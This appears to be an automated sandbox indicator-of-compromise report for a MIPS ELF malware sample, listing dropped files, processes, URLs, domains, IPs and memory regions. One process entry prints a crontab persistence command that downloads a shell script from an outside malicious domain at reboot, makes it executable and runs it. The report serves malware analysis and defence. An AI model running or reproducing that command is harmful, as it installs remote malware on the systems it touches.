IOC Report
hmips.elf

loading gif

Files

File Path
Type
Category
Malicious
hmips.elf
ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
initial sample
malicious
/var/spool/cron/crontabs/tmp.v3tZhA
ASCII text
dropped
malicious

Processes

Path
Cmdline
Malicious
/tmp/hmips.elf
/tmp/hmips.elf
/tmp/hmips.elf
-
/bin/sh
sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
/bin/sh
-
/bin/sh
-
/usr/bin/crontab
crontab -l
/bin/sh
-
/usr/bin/crontab
crontab -
/tmp/hmips.elf
-
/tmp/hmips.elf
-
/tmp/hmips.elf
-
/usr/bin/dash
-
/usr/bin/rm
rm -f /tmp/tmp.65q81DRzJS /tmp/tmp.BPOhT08nAE /tmp/tmp.DimVUE3TAX
/usr/bin/dash
-
/usr/bin/rm
rm -f /tmp/tmp.65q81DRzJS /tmp/tmp.BPOhT08nAE /tmp/tmp.DimVUE3TAX
There are 5 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://hailcocks.ru/wget.sh;
unknown

Domains

Name
IP
Malicious
kingstonwikkerink.dyn
194.87.198.29

IPs

IP
Domain
Country
Malicious
86.107.100.80
unknown
Romania
malicious
81.29.149.178
unknown
Switzerland
malicious
213.182.204.57
unknown
Latvia
193.233.193.45
unknown
Russian Federation
109.202.202.202
unknown
Switzerland
54.171.230.55
unknown
United States
88.151.195.22
unknown
Azerbaijan
91.149.238.18
unknown
Poland
91.189.91.43
unknown
United Kingdom
91.189.91.42
unknown
United Kingdom

Memdumps

Base Address
Regiontype
Protect
Malicious
55fb88c29000
page read and write
55fb8608b000
page read and write
7f1fd330c000
page read and write
7f1fd3435000
page read and write
55fb8608b000
page read and write
7f1fd2769000
page read and write
7f1fd3482000
page read and write
7f1f4c453000
page read and write
7fff91b20000
page execute read
55fb880aa000
page read and write
7f1fd312b000
page read and write
55fb86095000
page read and write
55fb86095000
page read and write
55fb880aa000
page read and write
7f1f4c459000
page read and write
55fb88093000
page execute and read and write
7f1fd1f53000
page read and write
7f1fd2a19000
page read and write
7f1fd2ddd000
page read and write
7f1f4c459000
page read and write
55fb88093000
page execute and read and write
7f1fd2dba000
page read and write
7fff91a82000
page read and write
7f1fd2a19000
page read and write
55fb88c29000
page read and write
7f1fcc000000
page read and write
7f1f4c412000
page execute read
7f1fd2dfa000
page read and write
7fff91b20000
page execute read
7f1fd343d000
page read and write
7f1fcc021000
page read and write
7f1fd330c000
page read and write
7f1fd275b000
page read and write
7f1fd312b000
page read and write
55fb85e03000
page execute read
7f1fd275b000
page read and write
7f1fd343d000
page read and write
7f1f4c453000
page read and write
7f1fd2dfa000
page read and write
7f1fd1f53000
page read and write
7fff91a82000
page read and write
7f1fd2ddd000
page read and write
7f1fd3482000
page read and write
7f1fcc021000
page read and write
7f1fd3435000
page read and write
55fb85e03000
page execute read
7f1fd2dba000
page read and write
7f1f4c412000
page execute read
7f1fd2769000
page read and write
7f1fcc000000
page read and write
There are 40 hidden memdumps, click here to show them.